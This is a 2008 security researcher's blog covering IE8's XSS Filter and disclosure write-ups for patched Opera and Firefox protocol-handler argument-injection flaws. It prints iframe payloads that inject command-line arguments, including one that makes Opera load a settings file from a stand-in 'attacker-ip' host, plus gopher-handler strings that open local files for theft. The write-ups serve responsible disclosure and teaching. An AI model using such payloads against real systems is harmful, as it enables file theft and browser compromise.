Thursday, September 4th, 2008
I run a number of different browsers, for various reasons. I was once even called a “browserholic” by a colleague! I pulled down IE8b2 when it went live a week ago. I don’t want to talk about the myriad of security features or browsing features as I think they’ve been covered in detail by many different sources, but I do want to mention one security feature… XSS Filter
XSS Filter was created by David Ross… he’s one of the smartest guys I’ve ever met. In addition to being super smart, there is a certain boldness needed to take the lead in developing Internet Explorer’s built-in defense for the bane of the web. David asked a number of security pros around the world to take a look at XSS Filter and I’m honored to have been asked to help. You can see some of the names of those who participated in XSS-Filter’s creation here.
Thanks David and CONGRATS on the release!
Some technical details with regards to XSS-Filter can be found here.
Friday, August 22nd, 2008
It always takes me a few weeks to work the booze out of my system after Blackhat and Defcon… but on the show…
Opera 9.52 was released a few days ago… I hope you’ve upgraded! Working with the Opera Security Team was a pleasure. I think they have the most creative way of tracking each bug (by email address) and they were VERY responsive.
A while back, I reported an issue to the Opera Security Team about some Opera protocol handling abuse I came across. You can read the initial advisory here. Now, when the initial advisory went out, the Opera Security Team asked me to hold off on the details until they published a follow up advisory, which can be found here. Since the issue is patched and the second advisory is out, lets go over the details:
First of all… this is a cross application issue (I think Blended Threat is the sexy term being used these days). We’ll use a protocol handling “aware” application to launch these attacks against Opera. Opera just has to be installed someplace on the victim’s machine for this to work.
When a user installs Opera, the following protocol hanlder is registered:
Opera.Protocol ”C:\Program Files\Opera\Opera.exe” “%1″
Which means.. when I call Opera.Protocol://test, the following basically gets passed to the command line (this is a simplified explanation, but hey… I’m a simple guy).
c:\Program Files\Opera\Opera.exe “Opera.Protocol://test”
Knowing this and determining that no internal check is done to distinguish between protocol handling and command line access, we are free to inject arbitrary arguments, which will be passed to Opera. In the first example, we will inject the location of a local html file. When the html file is loaded a warning will be presented to the user, but the contents will be rendered regardless of the user decision. The protocol handling string we use looks like this:
<iframe src = ‘opera.protocol:www.test.com” “file://c:\test.html ‘>
which ends up executing the following:
c:\program files\opera\opera.exe “opera.protocol:www.test.com” “file://c:\test.html”
If we can somehow place an html file to a known location this would be bad. For arguments sake, lets assume Nate Mcfeters didn’t figure out a way to drop arbitrary content to a known location a few days ago (did I say that outloud?) … what else can we do?
Taking a look at the command line arguments supported by Opera, we see a couple interesting items… one of which is the “/settings” argument. the ”/settings” argument allows for Opera.exe to be loaded with an arbitrary INI file. A quick examination of what’s contained in an Opera INI file shows that if we can control the contents of the INI file, then we can control: Cache directories, debugging mode, proxy settings, script execution, java behavior, whether items are automatically RUN after downloading… the list goes on and on…
<iframe src = ‘opera.protocol:www.test.com” /settings “//attacker-ip/ini-file.ini ‘>
which will result in something like this:
c;\program files\opera\opera.exe “opera.protocol:www.test.com” /settings “//attacker-ip/ini-file.ini”
OUCH….Thankfully… the Opera Security Team has fixed this particular issue! Kudos to them!
Monday, July 21st, 2008
As promised… a quick look at MFSA2008-35:
When FireFox is installed, it registers the following protocol handlers:
Note, Firefox3 no longer registers the Gopher protocol handler, which is a great security decision.
Both of these protocol handlers point to Firefox.exe in the following manner:
- “C:\Program Files\Mozilla Firefox\firefox.exe” -requestPending -osint -url “%1″
When Gopher:// or FirefoxURL:// are called, the arguments are passed to the “%1” portion in the string shown above. For example, gopher://test will result in the following:
- “C:\Program Files\Mozilla Firefox\firefox.exe” -requestPending -osint -url “gopher://test“
Knowing that we have absolute control over the –url argument being passed to Firefox.exe, we can use the “|” character to pass multiple, arbitrary URLs to the –url argument. Firefox has protections against remote web pages from redirecting to file:// and chrome:// content, but in this instance we are passing the URLs via protocol handler. When arguments are passed via protocol handler, it’s essentially as if we are passing the –url argument to firefox.exe via the command line. So, thanks to the protocol handlers the file:// and chrome:// restrictions can be bypassed. This is done in the following manner:
- gopher:test|file:c:/path/filename
- gopher:test|chrome://browser/content/browser.xul
Note – It is also possible to pass “javascript://” URIs to Firefox.exe, but javascript URIs passed via the command line will be loaded in the context of about:blank. This is a great security decision on behalf of Mozilla and saved them from having a standalone sploit.
Now that we have the ability to load local content via the protocol handlers registered by Firefox, we must now find a way to plant the attacker controlled content to a known location. There are a couple ways to plant attacker controlled content to a known location, but I’ll keep it simple (and responsible) and use the recently patched Safari “Carpet Bomb” attack as an example. When Safari encountered an unknown content type, it would download the content of the file to the user’s desktop. This gives us a semi known location, as we’ll have to guess the username. We can send a LOT of guesses for username as demonstrated below.
- <html><body><iframe src=”gopher:file:c:/path/filename|file:c:/path/ filename2|file:c:/path/ filename3….>
There are other methods that don’t involve guessing the username, but I won’t go into that (remember, it’s the kinder, gentler BK!).
So, if a user is browsing the web with Safari and has Firefox installed, I could plant a HTML file with javascript (XMLHTTP) onto the user’s desktop. Once the content is planted, I can launch the gopher:// protocol handler (gopher is launched by Safari without user consent) and point Firefox.exe to the local content. When Firefox loads the local content, the XMLHTTP request has access to the entire user file system (as the script was loaded from the local file system).
Firefox3 has implemented security measures to prevent arbitrary file access and limits the XMLHTTP request to the currently loaded directory (and possibly subdirs?), which is a great security decision.
On a side note, IE warns users when active script is about to be run from the local file system. I believe the IE warning message states, “you are about to do something REALLY stupid… do you wish to continue?” … or something like that. This is a great security decision on behalf of IE.
The scenario presented above demonstrates how someone with Safari and FireFox installed could get their files stolen, but Mozilla understood that the behavior of their software could be abused by other software (not just Safari), just as Apple understood that dropping files to a user’s desktop (without consent) could be abused by other software as well (not just IE or Firefox). Both vendors did what was right and adjusted the behavior of their software. Thanks Mozilla and Apple!
These types of issues interest me because it represents the difficulties in securing real life systems, systems that have software from multiple vendors interacting with each other, depending on each other to make the right security decisions. In isolation, these issues may not be of any concern, but together they create a situation where the security measures of one piece of software is bypassed because of the seemingly innocuous/insecure/stupid behavior of another, seemingly unrelated piece of software. From what I understand, Mark Dowd and Alexander Sotirov plan to give some INSANE examples of this at Blackhat… I’m looking forward to the talk!
